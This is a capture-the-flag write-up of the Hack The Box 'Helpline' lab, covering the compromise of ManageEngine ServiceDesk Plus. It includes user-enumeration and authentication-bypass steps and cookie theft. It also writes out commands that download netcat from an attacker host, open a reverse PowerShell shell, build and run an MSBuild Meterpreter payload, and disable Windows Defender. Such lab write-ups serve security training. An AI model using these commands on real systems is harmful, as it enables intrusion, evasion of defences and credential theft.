---
title: "Helpline"
classes: wide
excerpt: "This post is a write-up for the Helpline box on [hackthebox.eu](https://www.hackthebox.eu)"
date: 2019-08-16T13:30:30-04:00
tags:
  - hackthebox
  - helpline
  - powershell
  - htb
  - writeups
  - web
  - ManageEngine
  - python
  - exploit
---

This post is a write-up for the Helpline box on [hackthebox.eu](https://www.hackthebox.eu)
<figure>
    <a href="https://blog.chadp.mehttps://blog.chadp.me/assets/images/helpline/Cp5mzYDbH8zu2YeS.png"><img src="https://blog.chadp.mehttps://blog.chadp.me/assets/images/helpline/Cp5mzYDbH8zu2YeS.png"></a>
</figure>

### Enumeration
Start by enumerating the ports on the machine. Run `nmap` and document the result:
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/L1VMcpNDKVwn1TBD.png"><img src="https://blog.chadp.me/assets/images/helpline/L1VMcpNDKVwn1TBD.png"></a>
  <figcaption>Nmap on 10.10.10.132 with scripts</figcaption>
</figure>

`Nmap` discovers that ports 135, 445, 8080 and 5985 are open. Ports 8080 and 5985 looks interesting.
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/pGlQr44wZXMzlROW.png"><img src="https://blog.chadp.me/assets/images/helpline/pGlQr44wZXMzlROW.png"></a>
  <figcaption>ManageEngine ServiceDesk on port 8080</figcaption>
</figure>

Browsing to the website on port 8080, we find ManageEngine Service Desk Plus v9.3. A quick Google search finds quite a few interesting exploits. Since we have some time, let's start trying each one and see what we can get.

1. [ManageEngine ServiceDesk Plus 9.0 - User Enumeration](https://www.exploit-db.com/exploits/35891)
This exploit can fuzzing “domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=XXXX”, which will give different results (initially an existing domain) if a user exists or not.

Run the following `Wfuzz` command to get a list of usernames:
```
wfuzz -c -Z -z file,/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt 'http://10.10.10.132:8080/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=FUZZ'
```
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/k20R2TBroV2KuZzA.png"><img src="https://blog.chadp.me/assets/images/helpline/k20R2TBroV2KuZzA.png"></a>
  <figcaption>Wfuzz usernames</figcaption>
</figure>

Fire up BurpSuite and verify some usernames:
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/DoUsA9wVpvt3JD3s.png"><img src="https://blog.chadp.me/assets/images/helpline/DoUsA9wVpvt3JD3s.png"></a>
</figure>
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/BqfEf4rWMPTdwm9t.png"><img src="https://blog.chadp.me/assets/images/helpline/BqfEf4rWMPTdwm9t.png"></a>
</figure>

Two users are verified, unfortunately no domain leak:
- `guest`
- `administrator`

1. [ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass](https://www.exploit-db.com/exploits/42037)
This exploit can bypass authentication using a valid username and the same username as a password on `/mc/` (mobile client). Then you can keep those credentials, and delete `/mc/`from the URL.

The exploit works great for `**guest**`, but not for `administrator`.
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/1k1E1Qvs0I6LBmQx.png"><img src="https://blog.chadp.me/assets/images/helpline/1k1E1Qvs0I6LBmQx.png"></a>
  <figcaption>Authenticating as guest</figcaption>
</figure>

1. [Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation](https://www.exploit-db.com/exploits/46659)
This exploit can steal other user’s cookies via `WOListView.do`. Download the exploit, modify `host` parameter, and remove line 5 (comments about authors) to bypass problems about encoding.
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/pC0GWUgbY8G2Cvuw.png"><img src="https://blog.chadp.me/assets/images/helpline/pC0GWUgbY8G2Cvuw.png"></a>
  <figcaption>Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation</figcaption>
</figure>

Run the exploit and note the outputted cookies:
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/MBvULMbCS0jrmOVi.png"><img src="https://blog.chadp.me/assets/images/helpline/MBvULMbCS0jrmOVi.png"></a>
  <figcaption>Administrator cookies</figcaption>
</figure>

Paste the outputted cookies into the web browser's Cookie Manager, and you should gain administrator privileges on ManageEngine ServiceDesk.
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/7M6llqXUQa2vryEV.png"><img src="https://blog.chadp.me/assets/images/helpline/7M6llqXUQa2vryEV.png"></a>
  <figcaption>Administrator cookies in browser</figcaption>
</figure>
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/ztmbdmkeh7qUw5sO.png"><img src="https://blog.chadp.me/assets/images/helpline/ztmbdmkeh7qUw5sO.png"></a>
  <figcaption>Administrator Session</figcaption>
</figure>

RCE can be obtained by using the functionality available by default in `Helpdesk>Custom triggers`, which is triggered by `Requests > New Incident`:
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/bNLxpqEkIj21Z6td.png"><img src="https://blog.chadp.me/assets/images/helpline/bNLxpqEkIj21Z6td.png"></a>
  <figcaption>Custom Trigger</figcaption>
</figure>

Create a new request to trigger the custom trigger:
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/o9nPx5ggCcQb21T7.png"><img src="https://blog.chadp.me/assets/images/helpline/o9nPx5ggCcQb21T7.png"></a>
  <figcaption>New Request</figcaption>
</figure>

Run `tcpdump -i tun0 icmp -vvv` and receive a valid RCE:
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/h7vGFCdaH6l4z18w.png"><img src="https://blog.chadp.me/assets/images/helpline/h7vGFCdaH6l4z18w.png"></a>
  <figcaption>ICMP traffic</figcaption>
</figure>

### Exploiting the RCE
Using the same process, create 2 custom triggers with the following execute commands:
```
cmd /c curl http://10.10.14.248:8081/nc64.exe -o C:\Windows\System32\spool\drivers\color\nc64.exe
```

```
cmd /c C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.248 1234 -e powershell.exe
```

After catching the reverse shell, run the following command to search the system log files:
```
(get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={$_.Properties[8].Value }}).commandline
```
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/kYR6trTapbygMGgz.png"><img src="https://blog.chadp.me/assets/images/helpline/kYR6trTapbygMGgz.png"></a>
  <figcaption>RCE to Reverse Shell</figcaption>
</figure>

At this point it is a good idea to pop a more persistent Meterpreter shell. I like to use [GreatSCT](https://github.com/GreatSCT/GreatSCT). Clone the repo and then run the following to install and create a payload:
```
./setup.sh -c
cd ..
python3 GreatSCT.py
use Bypass
list
use msbuild/meterpreter/rev_tcp.py
set LHOST 10.0.0.1
set LPORT 1235
generate
cp /usr/share/greatsct-output/source/abc1231.xml ~/abc1231.xml
```

Setup the Meterpreter listener on the attacking machine:
```
msfconsole -r /usr/share/greatsct-output/handlers/abc1231.rc
```

Run the following on the victim machine to launch the connection:
```
curl http://10.10.14.248:8081/abc1231.xml -o C:\ProgramData\abc1231.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\ProgramData\abc1231.xml
```

### Getting User

After catching the Meterpreter shell, we know that user.txt is encrypted, so use the following commands to drop into powershell and decrypt the file:
```
meterpreter> shell
C:\ProgramData>powershell
PS C:\ProgramData> $user = 'HELPLINE\tolu'; $pw='!zaq1234567890pl!99'; $secpw=ConvertTo-SecureString $pw -AsPlainText -Force; $cred= New-Object System.Management.Automation.PSCredential $user,$secpw; Invoke-Command -ComputerName HELPLINE -Credential $cred -Authentication credssp -ScriptBlock {type C:\users\tolu\desktop\user.txt}
```
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/TzDVgwBOkZxoVutc.png"><img src="https://blog.chadp.me/assets/images/helpline/TzDVgwBOkZxoVutc.png"></a>
  <figcaption>user.txt</figcaption>
</figure>

### Getting Root

In the same Meterpreter shell, run the following to disable Windows Defender:
```
Set-MpPreference -DisableRealtimeMonitoring $true
```

Run each line one a time to decrypt the admin-pass.xml file in a similar way to the user.txt process:
```
$User = "Helpline\Administrator"
$File = "admin-pass.xml"
$MyCredential=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User, (Get-Content $File | ConvertTo-SecureString)
Invoke-Command -ComputerName HELPLINE -Credential $MyCredential -Authentication credssp -ScriptBlock {whoami}
Invoke-Command -ComputerName HELPLINE -Credential $MyCredential -Authentication credssp -ScriptBlock {type C:\Users\Administrator\Desktop\root.txt}
```
<figure>
    <a href="https://blog.chadp.me/assets/images/helpline/E8tZJrCAZcSsFY4U.png"><img src="https://blog.chadp.me/assets/images/helpline/E8tZJrCAZcSsFY4U.png"></a>
  <figcaption>user.txt</figcaption>
</figure>
